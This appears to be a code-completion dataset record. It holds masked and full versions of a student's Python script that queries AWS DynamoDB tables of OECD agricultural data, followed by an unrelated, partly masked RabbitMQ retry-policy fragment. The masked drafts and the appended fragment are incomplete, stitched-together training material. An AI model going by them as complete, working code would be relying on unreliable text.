"step-2": "<mask token>\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n 
print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\ndef is_common_variable(commodity_code, variable):\n return has_commodity_and_variable(na_table, commodity_code, variable\n ) and has_commodity_and_variable(canada_table, commodity_code, variable\n ) and has_commodity_and_variable(usa_table, commodity_code, variable\n ) and has_commodity_and_variable(mexico_table, commodity_code, variable\n )\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: 
{variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n 
print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n 
print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\ndef is_common_variable(commodity_code, variable):\n return has_commodity_and_variable(na_table, commodity_code, variable\n ) and has_commodity_and_variable(canada_table, commodity_code, variable\n ) and has_commodity_and_variable(usa_table, commodity_code, variable\n ) and has_commodity_and_variable(mexico_table, commodity_code, variable\n )\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: 
{variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n 
print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\nmain()\n",
"step-4": "<mask token>\nimport boto3\nimport csv\nimport sys\nfrom boto3.dynamodb.conditions import Key, Attr\nNORTH_AMERICA = 'northamerica'\nCANADA = 'canada'\nUSA = 'usa'\nMEXICO = 'mexico'\nTABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]\nYEAR_RANGE = range(2010, 2030)\nOUTPUT_FORMAT = '{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}'\nENCODINGS_CSV = 'encodings.csv'\nUSAGE_STATEMENT = 'Usage: py queryOECD.py <commodity-code|commodity-label>'\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n 
variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\ndef is_common_variable(commodity_code, variable):\n return has_commodity_and_variable(na_table, commodity_code, variable\n ) and has_commodity_and_variable(canada_table, commodity_code, variable\n ) and has_commodity_and_variable(usa_table, commodity_code, variable\n ) and has_commodity_and_variable(mexico_table, commodity_code, variable\n )\n\n\ndef 
has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: {variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n 
print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\nmain()\n",
"step-5": "#!/usr/bin/env python\n\n'''\n@author : Mitchell Van Braeckel\n@id : 1002297\n@date : 10/10/2020\n@version : python 3.8-32 / python 3.8.5\n@course : CIS*4010 Cloud Computing\n@brief : A1 Part 2 - AWS DynamoDB ; Q2 - Query OECD\n\n@note :\n Description: There are many CSV files containing info from the OECD about agricultural production, each for various regions around the world.\n Queries all 4 tables (northamerica, canada, usa, mexico -table names) based on a commodity (code key or label),\n looking for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,\n then output the specific NA definition 'hit' results and probable conclusion for NA definition per variable,\n as well as an overall conclusion for NA definition\n\n NOTE: forgot to add ability to specify commodity as cmd line arg instead of STDIN\n\n NOTE: assume year range is 2010 to 2029 (inclusive)\n NOTE: assume perfect user input for commodity and variables\n - however, if input commodity that's not a valid commodity code or label, exits program with error message\n NOTE: NA definition hit refers to if the calculated sum from different tables of CAN, USA, MEX are equal to that of NA (CAN+USA, CAN+USA+MEX, or Neither)\n'''\n\n'''\n IMPROVEMENT: Use 'encodings' table instead of the CSV file\n'''\n\n############################################# IMPORTS #############################################\n\n# IMPORTS - 'pip install <import-package>'\nimport boto3\nimport csv\nimport sys\nfrom boto3.dynamodb.conditions import Key, Attr\n\n############################################ CONSTANTS ############################################\n\n# TABLE CONSTANTS\nNORTH_AMERICA = \"northamerica\"\nCANADA = \"canada\"\nUSA = \"usa\"\nMEXICO = \"mexico\"\nTABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]\nYEAR_RANGE = range(2010, 2030)\n\n# OTHER CONSTANTS\nOUTPUT_FORMAT = \"{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}\"\nENCODINGS_CSV = 
\"encodings.csv\"\n#ENCODINGS_TABLE_NAME = \"encodings\"\nUSAGE_STATEMENT = \"Usage: py queryOECD.py <commodity-code|commodity-label>\"\n\n############################## STATE VARIABLES, INITIALIZATION, MAIN ##############################\n\n# MAIN - Declares global vars and state here, then ask for commodity (check both key/label),\n# look for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,\n# then output the specific NA definition 'hit' results and probable conclusion for NA definition\ndef main():\n #globals\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n\n # ========== ARGUMENTS ==========\n\n # Collect command line arguments when executing this python script\n argc = len(sys.argv)\n bad_usage_flag = False\n \n # Check #of args (deal with it later tho)\n # 1 optional arg for commodity, otherwise prompt user for it\n if argc > 2:\n bad_usage_flag = True\n print(\"Error: Too many arguments.\")\n \n # Exit with usage statement if flag has been triggered for any reason\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n\n # ========== AWS DYNAMO DB ==========\n\n # Init AWS DynamoDB client and resource (NOTE: these are global)\n dynamodb_client = boto3.client(\"dynamodb\")\n dynamodb_resource = boto3.resource(\"dynamodb\")\n\n # Validate AWS DynamoDB credentials (by testing if 'list_tables()' works)\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\")\n sys.exit(f\"[ERROR] {e}\")\n\n # Check the 4 tables exist, then get them all\n err_output = \"\"\n table_list = dynamodb_client.list_tables()['TableNames']\n\n print(f\"Existing Tables: {table_list}\")\n\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += f\"Error: Invalid table name 
'{t}' - table does not exist.\\n\"\n \n # Print all tables that did not exist, then exit\n if err_output != \"\":\n print(err_output.strip(\"\\n\"))\n sys.exit(\"ERROR: Terminating program because unable to get table that does not exist.\")\n\n # Get all tables (after checking they exist) (NOTE: these are global)\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n\n # Open the encodings CSV file and read its contents\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, \"r\", newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n\n # if field is var or commodity, set a key-value pair between code and label (in the respective map)\n for row in csv_content:\n if row[2] == \"variable\":\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == \"commodity\":\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n\n # Check args for commodity now, otherwise prompt user\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n # Ask user for commodity\n commodity_input = input(\"Commodity: \").strip()\n \n # Check if input exists as code key, otherwise try to convert assumed label to code key (if not a label, code will be None after)\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input, commodity_encodings_dict)\n\n # Check if commodity found a code or None\n print(f\"ENCODING: {commodity_code}\")\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\"ERROR: Terminating program because input does not exist as an encoding commodity code or label.\")\n\n # Init total accumulators for each category\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n\n # iterate through each 
variable and analyze data (if applicable)\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict, commodity_encodings_dict)\n\n # Determine the NA definition for this variable based on #of 'hits' per year\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = \"CAN+USA\"\n elif total_can_usa_mex == max_hits:\n na_defn = \"CAN+USA+MEX\"\n else:\n na_defn = \"Neither\"\n\n print(f\"Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither\")\n print(f\"Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n\")\n\n############################################ FUNCTIONS ############################################\n\n# Converts the label of a dict into its code key, returns None if not a label\ndef convert_dict_label_to_code_key(label, encodings_dict):\n # Get the key of the label if the label exists in the dict as a value\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).index(label)]\n else:\n return None\n\n# Check if a commodity code + variable is common across all 4 tables, return true if it is\ndef is_common_variable(commodity_code, variable):\n return (has_commodity_and_variable(na_table, commodity_code, variable) and\n has_commodity_and_variable(canada_table, commodity_code, variable) and\n has_commodity_and_variable(usa_table, commodity_code, variable) and\n has_commodity_and_variable(mexico_table, commodity_code, variable))\n\n# Check if a table has data for commodity code + variable (ie. 
scan table), returns true if at least 1 item is found\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(\n FilterExpression = Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )\n return response['Count'] > 0\n\n# Retrieves and outputs table data based on commodity and variable and analyze for NA definition\ndef output_table(commodity_code, variable, variable_encodings_dict, commodity_encodings_dict):\n # Bring in globals to modify\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n\n # Init local accumulators\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n\n # Print table headers: common variable (for commodity code) across all 4 tables, and table column names\n print(f\"Variable: {variable_encodings_dict[variable]}\")\n print(OUTPUT_FORMAT.format(\"Year\", \"North America\", \"Canada\", \"USA\", \"Mexico\", \"CAN+USA\", \"CAN+USA+MEX\", \"NA Defn\"))\n\n # Retrieve all data, from all years (ie. 
the items from the scan)\n na_scan_data = na_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n can_scan_data = canada_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n usa_scan_data = usa_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n mex_scan_data = mexico_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n\n # Sort each scan data by key\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n\n # Analyze data\n for year in YEAR_RANGE:\n # For each relevant year, calculate total value using multiplication factor\n i = year - 2010\n na_value = na_scan_data[i]['value'] * (10**na_scan_data[i]['mfactor'])\n can_value = can_scan_data[i]['value'] * (10**can_scan_data[i]['mfactor'])\n usa_value = usa_scan_data[i]['value'] * (10**usa_scan_data[i]['mfactor'])\n mex_value = mex_scan_data[i]['value'] * (10**mex_scan_data[i]['mfactor'])\n\n # Calc temp sums for the CAN+USA and CAN+USA+MEX columns\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n\n # Determine OECD def of NA, by checking if the temp calc sums from scan data calc values are equivalent to CAN+USA sum, CAN+USA+MEX sum, or Neither\n # Note: accumulate the #of accurate NA def 'hits'\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n\n # Print table row for current year\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value, mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n\n # Determine the NA definition for this 
variable based on #of 'hits' per year\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = \"CAN+USA\"\n elif temp_can_usa_mex == max_hits:\n na_defn = \"CAN+USA+MEX\"\n else:\n na_defn = \"Neither\"\n\n print(f\"North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither\")\n print(f\"Therefore we can conclude North America = {na_defn}\\n\")\n\n # Accumulate global totals using temp local accumulators for NA definition 'hits'\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n# Sorter Helper for queried data by year\ndef data_sort(elem):\n return elem['year']\n\n###################################################################################################\n\nmain()\n",
"step-ids": [
5,
6,
7,
9,
10
]
}
|
[
5,
6,
7,
9,
10
] |
<|reserved_special_token_0|>
class LimitedRetriesPolicy(BaseRetryPolicy):
<|reserved_special_token_0|>
def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',
**kwargs):
"""
:param Consumer consumer: message consumer instance
:param Iterable[int] retry_delays: Immutable list of retry backoff delays in
seconds. Message is sent to dlx when this list is exhausted.
e.g ``(1, 5, 10, 60, 5 * 60)``
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert len(retry_delays) > 0
super(LimitedRetriesPolicy, self).__init__(consumer,
retry_queue_suffix, **kwargs)
self.retry_delays = retry_delays
def retry(self, envelope):
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
The death count is used as an index for `retry_delays` list. Where each
item in the list represents a retry delay in seconds.
The message will be rejected if the death count exceeded the length of
`retry_delays` list.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
if death_count < len(self.retry_delays):
delay = self.retry_delays[death_count]
retry_queue_name = self.declare_retry_queue(delay)
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(exchange='', routing_key=
retry_queue_name, properties=envelope.properties, body=
envelope.payload)
